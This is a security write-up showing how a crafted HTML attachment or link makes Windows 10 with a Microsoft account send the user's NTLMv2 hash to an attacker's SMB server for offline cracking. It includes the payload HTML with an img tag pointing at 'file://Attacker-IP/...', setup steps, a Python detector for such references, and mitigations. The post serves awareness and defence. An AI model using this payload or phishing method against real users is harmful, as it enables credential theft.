Password hash leak via email attachment

Yesterday I saw a laptop running Windows 10. Nothing special, but the user used his Microsoft account in Windows 10. I thought it would be interesting to see how it works, especially because Microsoft pushes users to use a Microsoft account instead of a local account: https://www.bleepingcomputer.com/news/microsoft/microsoft-wants-to-do-away-with-windows-10-local-accounts/

Long story short: when a Microsoft account is used in Windows 10, it is possible to get the account's password hash (and the email address used) when the user clicks on a link inside an email or opens an HTML attachment.

To get the user's password hash I basically used the fact that Windows responds to SMB authentication requests using the user's credentials. This way the user doesn't have to provide credentials for each individual server. The downside is that any server can request authentication and Windows will respond. In enterprise environments, mitigations like SMB signing or GPOs (https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers) are in place to prevent Windows from leaking the user's hash. But these mitigations are not set for home users. Also, Windows Defender and the Windows Firewall will not block it.


When a Microsoft account is used in Windows 10, users no longer enter a password. Instead the user can use Windows Hello (PIN, fingerprint or face) or a physical security key. I focused on the PIN because I saw it on the laptop mentioned before.



In my test lab, I created a Windows 10 VM and linked a Microsoft account to it.


I also created a PIN which will be used at logon (instead of a password).


The next step was to run an SMB server collecting the user's NTLMv2 hash. I used https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py on my Kali machine.


Having the SMB server up and running, I "only" had to find a way to get the hash sent to my SMB server. After a short Google search I found this article: https://www.securify.nl/blog/living-off-the-land-stealing-netntlm-hashes For me the easiest approach was using an HTML file like this:

<!DOCTYPE html>
<html>
<img src="file://Attacker-IP/somefile.html"/>
</html>


Obviously "file://Attacker-IP/somefile.html" is the interesting part. When a user enters file://Attacker-IP/somefile.html in a browser, the browser will block this request. But when a local file (like file://C:/Folder/file.txt) is opened, nothing is blocked... With a "malicious" HTML file and link, an attacker can write an email (including a link and/or HTML attachment) to the victim. When the victim opens the link or attachment, the user's NTLMv2 hash will be sent to the attacker.
* Creating a website containing the above HTML code does not work with modern browsers; only with Internet Explorer. That's why I used a local file with the same content (file://Attacker-IP/somefile.html).
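A mail gateway or incident responder can flag attachments like the one above before they reach a user. The following is an added example (not code from the original post): it scans HTML for src/href/style references that would make Windows open an SMB session to a remote host (file://host/..., file:////host/..., \\host\share), while leaving local references such as file:///C:/... alone. The sample HTML is constructed and "Attacker-IP" is the post's placeholder, not a real host.

```python
"""Flag HTML attachments that reference remote UNC / file:// resources."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_ATTRS = {"src", "href", "data", "background", "poster", "action"}
_UNC_RE = re.compile(r"^\\\\[^\\\s]+(\\|$)")        # \\host\share\...
_CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)")  # url(...) inside style=


def is_remote_file_ref(value: str) -> bool:
    """True if resolving this reference would contact a remote SMB host."""
    v = value.strip()
    if _UNC_RE.match(v):                      # plain UNC path
        return True
    parsed = urlparse(v)
    if parsed.scheme.lower() != "file":
        return False
    host = parsed.netloc.lower()
    if parsed.path.startswith("//"):          # file:////host/share form
        return True
    if host in ("", "localhost") or re.fullmatch(r"[a-z]:", host):
        return False                          # file:///C:/..., file://C:/... stay local
    return True


class RemoteRefFinder(HTMLParser):
    """Collects (tag, attribute, value) for every remote file reference."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            candidates = [value] if name in URL_ATTRS else []
            if name == "style":
                candidates = _CSS_URL_RE.findall(value)
            for c in candidates:
                if is_remote_file_ref(c):
                    self.hits.append((tag, name, c))


def find_remote_refs(html: str):
    """Return the list of remote references found in an HTML document."""
    parser = RemoteRefFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample modelled on the post's attachment (placeholder host).
SAMPLE = """<!DOCTYPE html>
<html>
<img src="file://Attacker-IP/somefile.html"/>
<img src="file:///C:/Users/Public/logo.png"/>
<a href="https://example.com/">link</a>
</html>"""
```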

So I created an email containing the link and attachment and sent it to the victim (my Windows 10 test VM).


When the user (the victim) opens the email, nothing happens. But when the user clicks the link or opens the attachment, the user's NTLMv2 hash is sent to the attacker.




Now the attacker can try to crack the hash to get the user's password with tools like hashcat.


I created a proof of concept video.


There are many mitigations like SMB signing or restricting NTLM traffic to remote servers, but for me the best and also easiest mitigation is: don't use a Microsoft account in Windows 10, and use a strong password! If you don't want to use a local account, change your Microsoft account password. The NTLMv2 hash will still be the hash of the old password, so make sure that you don't use this password for other services.
